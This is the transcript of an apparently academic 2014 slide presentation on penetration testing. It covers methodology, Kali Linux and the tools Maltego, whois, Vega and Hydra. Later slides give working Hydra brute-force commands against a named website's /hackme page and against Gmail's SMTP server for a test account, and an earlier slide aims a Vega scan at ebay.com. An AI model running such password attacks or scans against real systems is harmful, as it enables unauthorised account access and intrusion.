Penetration Testing - PowerPoint PPT Presentation

1 / 27
About This Presentation
Title:

Penetration Testing

Description:

Title: Slide 1 Author: Lori Randel Last modified by: Elham Created Date: 4/19/2005 7:05:52 PM Document presentation format: On-screen Show (4:3) Company – PowerPoint PPT presentation

Number of Views:173
Avg rating:3.0/5.0
Slides: 28
Provided by: LoriR166
Category:

less

Transcript and Presenter's Notes

Title: Penetration Testing


1
  • Penetration Testing

Presented by Elham Hojati Advisor Dr. Akbar
Namin July 2014
2
Part onethe concept of penetration testing
3
What is a penetration test?(informal)
  • Port scanning
  • Vulnerability Scanning
  • Penetration Testing

3
4
What is a penetration test?
  • A penetration test is an attack on a computer
    system, network or Web application to find
    vulnerabilities that an attacker could exploit
    with the intention of finding security
    weaknesses, potentially gaining access to it, its
    functionality and data.
  • Pen tests can be automated with software
    applications or they can be performed manually.
  • The process includes
  • gathering information about the target before
    the test (reconnaissance),
  • identifying possible entry points(Port scanning),
  • attempting to break in (either virtually or for
    real)
  • reporting back the findings.

4
5
Why conduct a penetration test?
  • Prevent data breach
  • Test your security controls
  • Ensure system security
  • Get a baseline
  • Compliance

5
6
Steps of penetration test (informal)
  • Establish goal
  • Information gathering
  • Reconnaissance
  • Discovery
  • Port scanning
  • Vulnerability scanning
  • Vulnerability analysis
  • Taking control
  • Exploitation
  • Brute forcing
  • Social engineering
  • Pivoting
  • Reporting
  • Evidence collection
  • Risk analysis
  • Remediation

6
7
Some Considerations
  • Scope
  • Internal or external
  • In-house or outsourced
  • Selecting a pen-tester (white hat hacker)
  • White hat hacker vs Black hat hacker

Penetration tests are sometimes called white hat
attacks because in a pen test, the good guys are
attempting to break in. The term "white hat" in
Internet slang refers to an ethical computer
hacker, or a computer security expert, who
specializes in penetration testing and in other
testing methodologies to ensure the security of
an organization's information systems
7
8
Steps of penetration test
  • 12 subcategories of the Web Application
    Penetration Testing Methodology based on OWASP
    methodology
  • Introduction and Objectives
  • Information Gathering
  • Configuration and Deploy Management Testing
  • Identity Management Testing
  • Authentication Testing
  • Authorization Testing
  • Session Management Testing
  • Data Validation Testing
  • Error Handling
  • Cryptography
  • Business Logic Testing
  • Client Side Testing

8
9
Steps of network penetration test

9
10
Steps of penetration test
  • Step 1 Introduction and Objectives
  • Step 2Information gathering
  • Step 3Vulnerability analysis
  • Step 4Simulation (Penetrate the system to
    provide the proof)
  • Step 5Risk assessment
  • Step 6Recommendations for reduction or recovery
    and providing the report

10
11
Part 2Introduction to some Penetration Testing
Tools
https//drive.google.com/file/d/0B7j6y0yrm70VSmFGV
0VtYWpucHM/edit?uspsharing
pt.isfahanblog.com
12
Kali Linux
  • Kali Linux is a Debian-derived Linux
    distribution, designed for digital forensics and
    penetration testing.
  • Kali Linux is preinstalled with numerous
    penetration-testing programs.
  • Kali Linux can be run from a hard disk, live CD,
    or live USB. It is a supported platform of the
    Metasploit Project's Metasploit Framework, a tool
    for developing and executing security exploits.
  • From the creators of BackTrack comes Kali Linux,
    the most advanced penetration testing
    distribution created till now.

12
13
Installing Kali Linux
  • 1- Go to the link http//www.kali.org/downloads/
  • 2- Download a proper version of the kali Linux
    image (based on your system type, if it is 32
    bit or 64 bit, for example for 64 bit OS you can
    download Kali Linux 64 bit ISO (to find the type
    of the system right click on the computer icon
    in your desktop or in the start menu and go to
    the properties tab and read the system type
    there).
  • 3- Then you can write this ISO file to a cd or
    DVD or flash memory and use it or you can put it
    in the VMware like below.
  • 4- For running Kali Linux in the VMware, go to
    the start and type VMware Workstation and open
    that.
  • 5- Go to the file-gt new virtual machine to
    install the Kali Linux through this wizard.
  • 6- Install the Kali Linux and select it from the
    list in the left sideof the page and power it on.
  • 7- Type the user name and password (ex. User
    root Pass toor).
  • 8- Go to the application-gtKali Linux to see all
    the penetration testing tools there.

13
14
Penetration testing tools
  • whois for information gathering step
  • Maltego for information gathering step
  • Hydra for brute force step
  • Vega for Vulnerability analysis

14
15
Maltego
  • Maltego is an open source intelligence and
    forensics application.
  • It will offer you gathering of information as
    well as the representation of this information in
    an easy to understand format.

15
16
Maltego
  • 1- Go to the Applications -gt Kali Linux -gt top 10
    security tools -gt maltego, or open a command line
    terminal and type maltego.
  • 2- If it is your first time you want to run this
    program, you should register to this program by
    using an email address and then login to the
    program using this email address and the password
    that you set before.
  • 3- Go to the menu tab (a circle at the top left
    corner of the page) and select new.
  • 4-from the palette menu (from the left side of
    the page), select domain and drag and drop it to
    the middle of the page.
  • 5- Type the domain name in the property view of
    the domain (at the right side).
  • 6- Right click on the domain. Choose Run
    Transform-gt all transforms-gt to website DNS
  • 7- Right click on one of the websites and choose
    Run Transform-gt all transforms-gt
    ToServerTechnologiesWebsite.

16
17
Maltego
  • 8- Right click on one of the websites and choose
    Run Transform-gt all transforms-gt To IP Address.
  • 9- Right click on one of the IP address and
    choose Run Transform-gt all transforms -gtNet
    block using Whois.
  • 10- Right click on one of the net block and
    choose Run Transform-gt all transforms-gt
    toLocationCountryNetblock.
  • 11- Right click on one of the websites and choose
    Run Transform-gt all transforms-gt Mirror email
    addresses found

17
18
WHOIS SERVICE
  • WHOIS is a query and response protocol that is
    widely used for querying databases that store the
    registered users of an Internet resource, such as
    a domain name, an IP address block, or an
    autonomous system
  • It is also used for a wider range of other
    information.
  • The protocol stores and delivers database
    content in a human-readable format.

18
19
Using WHOIS SERVICE
  • 1- Open a command line terminal in Kali Linux and
    type whois lttargetgt for example whois google.com
  • 2- Type ping yahoo.com and find the IP address of
    yahoo.
  • 3-type whois ltyahoo IP addressgt
  • 4- Go to the link http//www.iana.org/whois and
    type google.com
  • 5- Go to the link http//www.whois.net/ and type
    www.google.com

19
20
Vega
  • Vega is a free and open source scanner and
    testing platform to test the security of web
    applications.
  • Vega can help you find and validate SQL
    Injection, Cross-Site Scripting (XSS),
    inadvertently disclosed sensitive information,
    and other vulnerabilities.
  • It is written in Java, GUI based, and runs on
    Linux, OS X, and Windows

20
21
Vega
  • 1- In the Kali Linux go to the Applications -gt
    Kali Linux -gt Web Applications -gt web crawlers -gt
    Vega, or Open a command line terminal in Kali
    Linux and type vega.
  • 2- Go to the link https//subgraph.com/vega/downlo
    ad/index.en.html to download Vega.
  • 3- Install the Vega tool and run it.
  • 4- Go to the scan tab -gt start new scan.
  • 5- Type http//www.ebay.com/ to find this website
    vulnerability.

21
22
Hydra Brute force Attack

22
23
Finding a username and password of a website
  • Go the the website http//www.sunstudiophotograph
    y.com/
  • Type /hackme at the end of the website URL
    address (for going to this part of the site you
    need to have a username and password).
  • Download a library of usernames and a library of
    passwords through the internet or use some tools
    such as key generator tools to produce a list of
    username and password ( now you have 2 files, one
    of the consists of a list of usernames and the
    other one consists of a list of passwords.)
  • Go to the command line terminal and type this
  • hydra ltwebsitegt -L ltuserlistgt -P ltwordlistgt -V -f
    http-get /ltsub dirgt
  • for example
  • hydra www.sunstudiophotography.com -L
    /root/Desktop/userlist.txt -P /root/Desktop/wordl
    ist.txt -V -f http-get /hackme
  • You find the username and password of this web
    site
  • Login to the website using the username guest
    and password password 4

23
24
Hydra-gtk Finding Gmail password
  • 1- Go to the Applications -gt Kali Linux -gt
    Password Attacks -gt Online Attacks -gt hydra-gtk
  • 2- Set
  • In the target tab
  • Single Target smtp.gmail.com
  • Port 465
  • Protocol smtp
  • Use SSL should be selected
  • Show Attempts should be selected
  • In the passwords tab
  • Username el.sec.test.2014_at_gmail.com
  • Password list browse and choose the password
    file
  • Try login as password should be selected.
  • Click start in the start tab.

24
25
  • 3- Hydra found gmail password11111111q
  • 4- Or you can go to the command line terminal and
    type
  • hydra -S -l el.sec.test.2014_at_gmail.com -P
    /root/Desktop/pass4.txt -V -s 465 smtp.gmail.com
    smtp
  • Or type
  • hydra -s 465 -S -V -l el.sec.test.2014_at_gmail.com
    -P/root/Desktop/pass4.txt -e s -t 36 -w 36
    smtp.gmail.com smtp

25
26
References
  • 1 http//en.wikipedia.org/wiki/White_hat_28comp
    uter_security29
  • 2 https//community.rapid7.com/docs/DOC-2248
  • 3 http//searchsoftwarequality.techtarget.com/de
    finition/penetration-testing
  • 4 http//en.wikipedia.org/wiki/Penetration_test
  • 5 https//www.securitymetrics.com/pentest_steps.
    adp
  • 6 http//www.kali.org/
  • 7 http//en.wikipedia.org/wiki/Kali_Linux
  • 8 https//www.paterva.com/web6/
  • 9 http//en.wikipedia.org/wiki/Whois
  • 10 https//subgraph.com/vega/
  • 11 http//www.youtube.com/watch?vplitHS8Tqdo

26
27
Question
27
Write a Comment
User Comments (0)
About PowerShow.com